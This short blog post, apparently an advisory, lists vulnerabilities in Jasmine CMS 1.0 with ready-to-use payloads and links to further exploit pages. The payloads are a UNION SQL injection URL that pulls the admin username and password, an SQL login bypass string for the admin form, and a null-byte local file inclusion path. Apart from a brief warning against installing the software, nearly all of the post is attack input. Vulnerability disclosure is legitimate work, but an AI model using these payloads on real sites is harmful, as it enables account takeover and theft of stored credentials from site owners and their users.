Multiple Vulnerabilities In Jasmine CMS 1.0
Foreword:
If your thinking about installing this appauling CMS, please think again! The developer clearly has no regard for the integrity of the information being used by the app. To list all the possible vulnerablities would just be silly so i'll list one of every attack type:
SQL Injection:
news.php?item=-999 UNION SELECT 0,password,0,0,0,0,username FROM user WHERE id=1/*
Admin Login Bypass:
Username = ' UNION SELECT id,username,email,signature,avatar_path,joined,total_visits,status FROM user WHERE id = '1'/*
Password = Anything or Nothing
Local File Inclusion:
admin/plugin_manager.php?u=[PATH TO LOCAL FILE]%00
...and i'm pretty sure there are tons of XSS vulns in here too.
Exploit:
http://www.w4ck1ng.com/board/showthread.php/0day-jasmine-cms-1-5525.html?p=22785
http://milw0rm.com/exploits/4081
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment